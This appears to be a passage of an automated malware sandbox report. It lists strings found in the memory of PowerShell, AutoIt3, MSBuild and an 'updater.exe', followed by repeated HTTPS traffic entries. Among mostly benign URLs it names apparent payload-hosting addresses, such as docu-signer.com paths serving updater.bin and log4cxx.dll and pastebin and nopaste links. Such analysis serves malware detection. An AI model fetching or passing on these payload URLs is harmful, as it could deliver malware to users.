                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3839692541.0000000004661000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3840592697.0000000002E71000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: updater.exe, 0000000E.00000000.1701220815.0000000001089000.00000002.00000001.01000000.0000000D.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000000.1836457636.0000000000A69000.00000002.00000001.01000000.0000000F.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1973869878.0000000000A69000.00000002.00000001.01000000.0000000F.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com
                    Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.dr | String found in binary or memory: http://x1.i.lencr.org/
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3839692541.0000000004661000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000004.00000002.3866570932.00000000098C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docu-signer.com
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dll
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin
                    Source: powershell.exe, 00000004.00000002.3866570932.0000000009394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docu-signer.comD
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000513C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005130000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000510B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GKvThLsGIjD-3KW32JCZ0mH01QvjulstQQuqXTlrEycWV1xiEPH6R
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GM3ThLsGIjCtpWH8rTPfgJ9HY11EkZX-MaTb-y6a0RAG3u7kf-ivt
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D07bbdd56f84a91b2:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D1b21e1938b173488:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D263b62db633173b7:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D415b9979ef9707d3:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D4edbbc5636b91633:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000510F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5312552b7084d89d:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000514C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5c9740ab0f014298:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D6f35d797be3b4dc6:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db212ceae686b1a2b:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dcdda55c2ba0f73fc:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000511B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df1b0eeacb1f5bf1d:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/index.js
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nopaste.net
                    Source: powershell.exe, 00000004.00000002.3838008180.00000000008C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nopaste.net/SFHgtxFGtB
                    Source: powershell.exe, 00000002.00000002.2542129886.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: MSBuild.exe, 00000016.00000002.1975336406.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQ
                    Source: MSBuild.exe, 00000014.00000002.1900948474.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.1975336406.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQPO
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://rrb.gov/
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIHThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GInThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJHThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJrThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000512C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKPThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLPThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLzThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000052AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GM3ThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GMTThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000505A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPDShLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPjShLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comHr
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.improveirs.org
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.irs.gov
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/Advocate/Local-Taxpayer-Advocate
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/Advocate/Systemic-Advocacy-Management-System-SAMS
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/VirtualCurrencyfaqs
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/about-irs/strategic-plan/direct-file
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/form1040
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/forms-pubs
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/freefile
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/irb/2006-40_IRB#NOT-2006-83
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/irb/2014-44_IRB#RP-2014-55
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/itin
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.irs.gov/pub/irs-pdf/i1040gi.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/pub/irs-pdf/p4134.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc154.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc553.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc756.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc901.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/uac/private-delivery-services-pds
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/uac/submission-processing-center-street-addresses-for-private-delivery-service-p
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.ssa.gov/forms/ss-5.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.ssa.gov/myaccount/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/contact-us
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/get-help/taxpayer-rights/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/litcmap
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
